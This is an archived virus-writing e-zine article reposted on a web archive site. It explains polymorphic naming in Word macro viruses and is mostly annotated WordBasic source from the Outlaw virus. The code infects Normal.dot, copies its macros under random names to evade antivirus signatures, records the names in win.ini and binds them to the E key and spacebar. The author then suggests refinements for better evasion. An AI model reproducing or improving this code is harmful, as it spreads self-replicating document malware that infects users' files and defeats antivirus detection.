Neperos
SIGN IN
Copy Link
Add to Bookmark
Report

SLAM.004: Polymorphism in macro virii

eZine's profile picture
eZine lover (@eZine)
Published in 
Slam
 · 2 years ago

POLYFORMISM IN MACRO VIRII

If you don't know what polymorfism is: it's a sort of encryption of a virus, but one that changes the encryption routine every infection.

I hope you got it now, but if you don't I'll say it again:"I'm not an english teacher so fuck it if you can't follow me."

The above description of polymorfism is mainly mend for dos (assembler) virii. With macro virii it is a bit different.
As you probably know a macro virii contains macros (duh...) and as you probably know, those macros have names (duh...). Several AV products look for those names to identify if a file is infected. So the only thing that is to be done is create different names every infection. That's easier said then done, believe me.

The very first polymorfic macro virus created was the Outlaw virus.
It was created by the Nightmare Joker from SLAM. The Outlaw source for creating random macro names is put down here. I think it's quite complicated so I give a full explanation of it beside the source.
For the complete Outlaw virus see "macro viruses".

'This is the macro that infects the Normal.dot 

---------------------------------------------------------------- 
Sub MAIN 
On Error Goto Done                      'Error handler. 

A$ = FileName$()                        'A$ = active filename. 
If A$ = "" Then Goto Finish             'If no file active goto finish. 

If CheckInstalled = 0 Then              'Already installed?... 
	Routine                         'No then goto Sub Routine, 
	Crypt                           'Sub Crypt, Sub PayLoadMakro, 
	PayloadMakro                    'etc. 
	FileSaveAll 1, 1 
Else                                    'Yes (already installed). 
	Goto Done                       'Goto done. 
End If 

Done:                                   'Done (already installed). 
A$ = FileName$()                        'A$ = active filename. 
If A$ = "" Then                         'If no file active goto finish. 
	Goto Finish 
Else                                    'If a file is active, 
	Insert " "                      'insert a "space", for infecting 
					'the active file. 
End If 

 
Finish:                                 'Finish (no file active). 
End Sub 

Sub Crypt                               'The Sub Crypt. 
One = 7369                              'Number one is 7369. 
Two = 9291                              'Number two is 9291. 
Num = Int(Rnd() * (Two - One) + One)    'generate random number. 
A$ = Str$(Num)                          'A$ is generated number. 
A$ = LTrim$(A$)                         'Delete the empty space before... 
					'the number. The empty space is... 
					'for making the number negative, 
					'e.g. -7369. 

Beginn = Hour(Now())                    'Beginn is the active hour. 
B$ = Str$(Beginn)                       'B$ is the active hour (string). 
B$ = LTrim$(B$)                         'Delete the empty space in B$. 

If B$ = "1" Then C$ = "A"               'If B$ is 1 (1 o'clock)... 
					'then C$ is A. 
If B$ = "2" Then C$ = "B"               'If B$ is 2 (2 o'clock)... 
					'then C$ is B. 
If B$ = "3" Then C$ = "C"               'If B$ is 3 (3 o'clock)... 
					'then C$ is C. 
If B$ = "4" Then C$ = "D"               'Etc. 
If B$ = "5" Then C$ = "E" 
If B$ = "6" Then C$ = "F" 
If B$ = "7" Then C$ = "G" 
If B$ = "8" Then C$ = "H" 
If B$ = "9" Then C$ = "I" 
If B$ = "10" Then C$ = "J" 
If B$ = "11" Then C$ = "K" 
If B$ = "12" Then C$ = "L" 
If B$ = "13" Then C$ = "M" 
If B$ = "14" Then C$ = "N" 
If B$ = "15" Then C$ = "O" 
If B$ = "16" Then C$ = "P" 
If B$ = "17" Then C$ = "Q" 
If B$ = "18" Then C$ = "R" 
If B$ = "19" Then C$ = "S" 
If B$ = "20" Then C$ = "T" 
If B$ = "21" Then C$ = "U" 
If B$ = "22" Then C$ = "V" 
If B$ = "23" Then C$ = "W" 
If B$ = "00" Then C$ = "X" 

E$ = C$ + A$                            'E$ is C$ (character) plus... 
					'A$ (the generated number). 
ZU$ = GetDocumentVar$("VirNameDoc")     'ZU$ is macro called VirNameDoc... 
					'Watch out:VirNameDoc is not... 
					'the real macro name, it's some... 
					'sort of string. 
PG$ = WindowName$() + ":" + ZU$         'PG$ is active filename plus... 
					'":" and plus macro name (ZU$). 
MacroCopy PG$, "Global:" + E$           'Copies macro from document... 
					'to global template, with... 
					'the name that was generated. 
SetProfileString "Intl", "Name2", E$    'Set the macro name in... 
					'win.ini. as "Intl", "Name2", E$. 
ToolsCustomizeKeyboard .KeyCode = 69, .Category = 2, .Name = E$, .Add, .Context = 0 
					'Creates short-cut with the... 
					'ascii keycode 69 (E). If the... 
					'E key is pushed the macro... 
					'E$ will be executed (The above... 
					'macro). With the .Add you tell... 
					'Word that you want to add that... 
					'function to the key not replace... 
					'it. 

End Sub                                 'End the Sub Crypt 

 

Sub Routine                             'Begin Sub Routine 
One = 7369                              'This is practically... 
Two = 9291                              'the same as Sub Crypt. 
Num = Int(Rnd() * (Two - One) + One)    'I will only explain the... 
A$ = Str$(Num)                          'things that aren't... 
A$ = LTrim$(A$)                         'explained above. 

Beginn = Hour(Now()) 
B$ = Str$(Beginn) 
B$ = LTrim$(B$) 

If B$ = "1" Then C$ = "A" 
If B$ = "2" Then C$ = "B" 
If B$ = "3" Then C$ = "C" 
If B$ = "4" Then C$ = "D" 
If B$ = "5" Then C$ = "E" 
If B$ = "6" Then C$ = "F" 
If B$ = "7" Then C$ = "G" 
If B$ = "8" Then C$ = "H" 
If B$ = "9" Then C$ = "I" 
If B$ = "10" Then C$ = "J" 
If B$ = "11" Then C$ = "K" 
If B$ = "12" Then C$ = "L" 
If B$ = "13" Then C$ = "M" 
If B$ = "14" Then C$ = "N" 
If B$ = "15" Then C$ = "O" 
If B$ = "16" Then C$ = "P" 
If B$ = "17" Then C$ = "Q" 
If B$ = "18" Then C$ = "R" 
If B$ = "19" Then C$ = "S" 
If B$ = "20" Then C$ = "T" 
If B$ = "21" Then C$ = "U" 
If B$ = "22" Then C$ = "V" 
If B$ = "23" Then C$ = "W" 
If B$ = "00" Then C$ = "X" 

D$ = C$ + A$                            'The same as in Sub Crypt... 
UZ$ = GetDocumentVar$("VirName")        'only with other names. 
GP$ = WindowName$() + ":" + UZ$ 
MacroCopy GP$, "Global:" + D$ 
SetProfileString "Intl", "Name", D$ 
ToolsCustomizeKeyboard .KeyCode = 32, .Category = 2, .Name = D$, .Add, .Context = 0 
					'This one creates a short-cut... 
					'with the D$ macro (this macro)... 
					'if the spacebar (keycode 32)... 
					'is pushed. 

End Sub 

Sub PayloadMakro                        'Same again. 
One = 7369 
Two = 9291 
Num = Int(Rnd() * (Two - One) + One) 
A$ = Str$(Num) 
A$ = LTrim$(A$) 

Beginn = Hour(Now()) 
B$ = Str$(Beginn) 
B$ = LTrim$(B$) 

If B$ = "1" Then C$ = "A" 
If B$ = "2" Then C$ = "B" 
If B$ = "3" Then C$ = "C" 
If B$ = "4" Then C$ = "D" 
If B$ = "5" Then C$ = "E" 
If B$ = "6" Then C$ = "F" 
If B$ = "7" Then C$ = "G" 
If B$ = "8" Then C$ = "H" 
If B$ = "9" Then C$ = "I" 
If B$ = "10" Then C$ = "J" 
If B$ = "11" Then C$ = "K" 
If B$ = "12" Then C$ = "L" 
If B$ = "13" Then C$ = "M" 
If B$ = "14" Then C$ = "N" 
If B$ = "15" Then C$ = "O" 
If B$ = "16" Then C$ = "P" 
If B$ = "17" Then C$ = "Q" 
If B$ = "18" Then C$ = "R" 
If B$ = "19" Then C$ = "S" 
If B$ = "20" Then C$ = "T" 
If B$ = "21" Then C$ = "U" 
If B$ = "22" Then C$ = "V" 
If B$ = "23" Then C$ = "W" 
If B$ = "00" Then C$ = "X" 

K$ = C$ + A$                            'Again another name. 
ZUZ$ = GetDocumentVar$("VirNamePayload") 
GP$ = WindowName$() + ":" + ZUZ$ 
MacroCopy GP$, "Global:" + K$ 
SetProfileString "Intl", "Name3", K$    'Only this time no... 
					'short-cut because this... 
					'is the payloadmacro and... 
					'this payload macro is only... 
					'executed on a special date... 
					'that is programmed in... 
					'another macro. For the... 
					'whole Outlaw virus, see... 
					'the virii section. 
End Sub 

Function CheckInstalled                 'A function to check if... 
					'the virus already installed... 
					'the global template (Normal.Dot). 
CC$ = GetProfileString$("Intl", "Name") 'CC$ is the name of the Routine... 
					'macro (Sub Routine). 
    CheckInstalled = 0                  'Set the var checkinstalled to 0. 
    If CountMacros(0) > 0 Then          'If the number of macros in... 
					'Normal.Dot is greater then 0, 
	For i = 1 To CountMacros(0)     'then create a for...next loop... 
					'that loops the number of macros. 
	    If MacroName$(i, 0) = CC$ Then    'If the macro name in... 
		CheckInstalled = 1      'Normal.dot is CC$ (routine... 
					'macro) then set var... 
					'CheckInstalled to 1. 
	    End If                      'Ends the If instruction. 
	Next i                          'All macros done? then... 
					'continue. Else go back to... 
					'for...next loop. 
    End If                              'Ends the If instruction. 
End Function                            'The end of the function. 
----------------------------------------------------------------


This is one macro from the Outlaw virus. To get the names of the macros, to use them in other macros, just use: 

CC$ = GetProfileString$("Intl", "Name")


CC$ can be any string name you want but make sure to use the right name you gave to the macro, in this example "Intl" and "Name".

Viewture & Optimization

A thing that could happen with the way this polymorphic name is generated is that you get 2 same names, OK it's obvious that it won't happen often but you never know. To correct this problem you can use the following code: 

Sub Crypt 
One = 1 
Two = 1000 
Num = Int(Rnd() * (Two - One) + One) 
A$ = Str$(Num) 
A$ = LTrim$(A$) 

------------------------- 

Sub Routine 
One = 1001 
Two = 2000 
Num = Int(Rnd() * (Two - One) + One) 
A$ = Str$(Num) 
A$ = LTrim$(A$)


And so on...


As you see I used different numbers so ou couldn't get a same name. You can also use different characters for the first letter.


Another thing is, that the virus checks for the time to generate the first letter. It could be better to randomly generate the first letter. That is fixed easily, just create a second random number generator that generates a number between 1 and 24.


And for the future......


--- Neophyte --- and some help from NJ

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

guest's profile picture
@guest
4 Nov 2024
In 1955, the explorer Thor Heyerdahl managed to erect a Moai in eighteen days, with the help of twelve natives and using only logs and stone ...
guest's profile picture
@guest
4 Nov 2024
For what unknown reason did our distant ancestors dot much of the surface of the then-known lands with those large stones? Why are such cons ...
guest's profile picture
@guest
4 Nov 2024
The real pyramid mania exploded in 1830. A certain John Taylor, who had never visited them but relied on some measurements made by Colonel H ...
guest's profile picture
@guest
4 Nov 2024
Even with all the modern technologies available to us, structures like the Great Pyramid of Cheops could only be built today with immense di ...
lostcivilizations's profile picture
Lost Civilizations (@lostcivilizations)
2 Nov 2024
In Sardinia, there is a legend known as the Legend of Tirrenide. Thousands of years ago, there was a continent called Tirrenide. It was a l ...
guest's profile picture
@guest
2 Nov 2024
What is certain is that the first Greek geographer to clearly place the Pillars of Hercules at Gibraltar was Eratosthenes (who lived between ...
guest's profile picture
@guest
1 Nov 2024
Disquieting thc drinks has been quite the journey. As someone keen on unpretentious remedies, delving into the in every respect of hemp has ...
guest's profile picture
@guest
29 Oct 2024
hi Good day I am writing to inform you of recent developments that may impact our ongoing operations. This morning, global news outlets hav ...
guest's profile picture
@guest
26 Oct 2024
primo
guest's profile picture
@guest
25 Oct 2024
хороший психотерапевт консультация психолога по омс
a Francesco Arca production 2016 - 2024
Terms of Service - Privacy Policy
neperos on mastodon
Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT